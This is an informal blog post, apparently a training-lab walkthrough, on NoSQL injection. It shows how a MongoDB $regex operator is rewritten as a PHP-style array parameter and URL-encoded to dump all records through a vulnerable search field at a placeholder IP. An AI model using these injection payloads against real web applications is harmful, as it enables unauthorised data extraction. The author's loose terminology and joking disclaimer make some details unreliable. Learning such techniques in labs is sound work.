welcome back to the struggle
I’m gonna start this one with a bit of an explainer(as far as I understand it,,,, anyway) so your ass better be taking notes & learning
You know from the previous section, bypassing authentication, that you have to php encode whatever you’re trying to inject. You know this as param: {$op: val} becoming param[$op]=val, so lets map this onto our situation.
Our basic request looks like this
http://XX.XXX.XX.XX:PORT/?q=KeittWe want to dump all the columns, so we want to send:
name: {$regex: /.*/}So we change its format to match the php: param[$op]=val
name[$regex]=/.*/Then url encode it to look like
name%5B%24regex%5D%3D%2F.*%2FThen we send that bad boy and…
http://XX.XXX.XX.XX:PORT/?q=name%5B%24regex%5D%3D%2F.*%2FIt doesn’t work. We’ve instead gotta send it through a vulnerable search query, and for us that’s q. So we just replace ‘name’ – which the server isn’t listening for, with q in the attack. This gives us:
http://XX.XXX.XX.XX:PORT/?q[$regex]=/.*/Don’t forget to encode!
http://XX.XXX.XX.XX:PORT/?q%5B%24regex%5D%3D%2F.*%2FThis dumps all the colums (hooray) and you get to move onto the horrors of blind data extraction :)))
So remember!!! You gotta get your little checklist together and figure out 1) where to inject into the vulnerable search query 2) whatcha gonna query & 3) to url encode that bad boy properly
I got kinda stuck on this because I wasn’t sure where to inject lmao so if this helps with your learning that’s sick as hell. Anyway dude I like to tell lies &spread misinformation on the internet so do ur own research 🙂
Leave a Reply